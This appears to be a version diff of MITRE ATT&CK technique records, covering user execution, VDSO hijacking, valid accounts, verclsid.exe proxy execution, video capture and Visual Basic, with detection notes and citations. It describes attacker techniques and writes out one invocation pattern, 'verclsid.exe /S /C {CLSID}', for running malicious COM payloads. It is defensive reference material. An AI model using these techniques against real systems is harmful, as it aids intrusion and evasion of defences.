| An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_remote_support | False |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-26 16:42:35.936000+00:00 | 2022-04-19 20:31:15.373000+00:00 |
| description | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery) |
| x_mitre_data_sources[0] | Application Log: Application Log Content | Container: Container Creation |
| x_mitre_data_sources[1] | Instance: Instance Start | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[2] | Instance: Instance Creation | Container: Container Start |
| x_mitre_data_sources[3] | Image: Image Creation | Instance: Instance Creation |
| x_mitre_data_sources[4] | Command: Command Execution | Instance: Instance Start |
| x_mitre_data_sources[5] | Container: Container Start | Image: Image Creation |
| x_mitre_data_sources[6] | Container: Container Creation | Process: Process Creation |
| x_mitre_data_sources[7] | Network Traffic: Network Connection Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[8] | Network Traffic: Network Traffic Content | Command: Command Execution |
| x_mitre_data_sources[9] | File: File Creation | Application Log: Application Log Content |
| x_mitre_data_sources[10] | Process: Process Creation | File: File Creation |
| x_mitre_version | 1.4 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Telephone Attack Delivery', 'description': 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery'} |
| Old Description | New Description |
|---|---|
| Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. | Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:28:45.232000+00:00 | 2022-07-07 17:09:09.048000+00:00 |
| description | Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. | Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. |
| external_references[1]['source_name'] | ELF Injection May 2009 | Backtrace VDSO |
| external_references[1]['description'] | O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020. | backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020. |
| external_references[1]['url'] | https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html | https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ |
| external_references[2]['source_name'] | Backtrace VDSO | Syscall 2014 |
| external_references[2]['description'] | backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020. | Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020. |
| external_references[2]['url'] | https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ | https://lwn.net/Articles/604515/ |
| external_references[3]['source_name'] | VDSO Aug 2005 | GNU Acct |
| external_references[3]['description'] | Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020. | GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. |
| external_references[3]['url'] | https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/ | https://www.gnu.org/software/acct/ |
| external_references[4]['source_name'] | Syscall 2014 | RHEL auditd |
| external_references[4]['description'] | Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020. | Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. |
| external_references[4]['url'] | https://lwn.net/Articles/604515/ | https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing |
| external_references[6]['source_name'] | GNU Acct | ELF Injection May 2009 |
| external_references[6]['description'] | GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. | O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020. |
| external_references[6]['url'] | https://www.gnu.org/software/acct/ | https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html |
| external_references[7]['source_name'] | RHEL auditd | VDSO Aug 2005 |
| external_references[7]['description'] | Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. | Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020. |
| external_references[7]['url'] | https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing | https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/ |
| x_mitre_detection | Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. | Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits) Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare) The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-560 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 03:29:48.018000+00:00 | 2022-10-19 19:57:39.849000+00:00 |
| description | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare) The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft) |
| external_references[1]['source_name'] | capec | volexity_0day_sophos_FW |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/560.html | https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ |
| external_references[2]['source_name'] | TechNet Credential Theft | CISA MFA PrintNightmare |
| external_references[2]['description'] | Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. | Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022. |
| external_references[2]['url'] | https://technet.microsoft.com/en-us/library/dn535501.aspx | https://www.cisa.gov/uscert/ncas/alerts/aa22-074a |
| external_references[3]['source_name'] | TechNet Audit Policy | TechNet Credential Theft |
| external_references[3]['description'] | Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. | Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016. |
| external_references[3]['url'] | https://technet.microsoft.com/en-us/library/dn487457.aspx | https://technet.microsoft.com/en-us/library/dn535501.aspx |
| x_mitre_defense_bypassed[1] | Host intrusion prevention systems | Anti-virus |
| x_mitre_defense_bypassed[2] | Network intrusion detection system | Host Intrusion Prevention Systems |
| x_mitre_defense_bypassed[3] | Application control | Network Intrusion Detection System |
| x_mitre_defense_bypassed[4] | System access controls | Application Control |
| x_mitre_defense_bypassed[5] | Anti-virus | System Access Controls |
| x_mitre_detection | Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. | Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. |
| x_mitre_version | 2.3 | 2.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet Audit Policy', 'description': 'Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/dn487457.aspx'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/560.html', 'external_id': 'CAPEC-560'} | |
| x_mitre_contributors | Syed Ummar Farooqh, McAfee | |
| x_mitre_contributors | Prasad Somasamudram, McAfee | |
| x_mitre_contributors | Sekhar Sarukkai, McAfee | |
| x_mitre_data_sources | Logon Session: Logon Session Creation | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Logon Session: Logon Session Creation |
| Old Description | New Description |
|---|---|
Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe) Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) |
Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-08-19 19:29:18.138000+00:00 | 2022-05-20 17:35:28.221000+00:00 |
| description | Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) |
Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) |
| external_references[1]['source_name'] | WinOSBite verclsid.exe | BOHOPS Abusing the COM Registry |
| external_references[1]['description'] | verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020. | BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020. |
| external_references[1]['url'] | https://www.winosbite.com/verclsid-exe/ | https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ |
| external_references[2]['source_name'] | LOLBAS Verclsid | Red Canary Verclsid.exe |
| external_references[2]['description'] | LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020. | Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020. |
| external_references[2]['url'] | https://lolbas-project.github.io/lolbas/Binaries/Verclsid/ | https://redcanary.com/blog/verclsid-exe-threat-detection/ |
| external_references[3]['source_name'] | Red Canary Verclsid.exe | LOLBAS Verclsid |
| external_references[3]['description'] | Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020. | LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020. |
| external_references[3]['url'] | https://redcanary.com/blog/verclsid-exe-threat-detection/ | https://lolbas-project.github.io/lolbas/Binaries/Verclsid/ |
| external_references[4]['source_name'] | BOHOPS Abusing the COM Registry | Nick Tyrer GitHub |
| external_references[4]['description'] | BOHOPS. (2018, August 18). Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques. Retrieved August 10, 2020. | Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020. |
| external_references[4]['url'] | https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ | https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 |
| external_references[5]['source_name'] | Nick Tyrer GitHub | WinOSBite verclsid.exe |
| external_references[5]['description'] | Tyrer, N. (n.d.). Instructions. Retrieved August 10, 2020. | verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block . Retrieved August 10, 2020. |
| external_references[5]['url'] | https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 | https://www.winosbite.com/verclsid-exe/ |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen. In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-14 19:40:47.644000+00:00 | 2022-03-15 20:06:04.793000+00:00 |
| x_mitre_data_sources[0] | Process: OS API Execution | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: OS API Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | Linux |
| Old Description | New Description |
|---|---|
| Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. | Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking ) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 21:03:21.051000+00:00 | 2022-03-07 19:43:49.315000+00:00 |
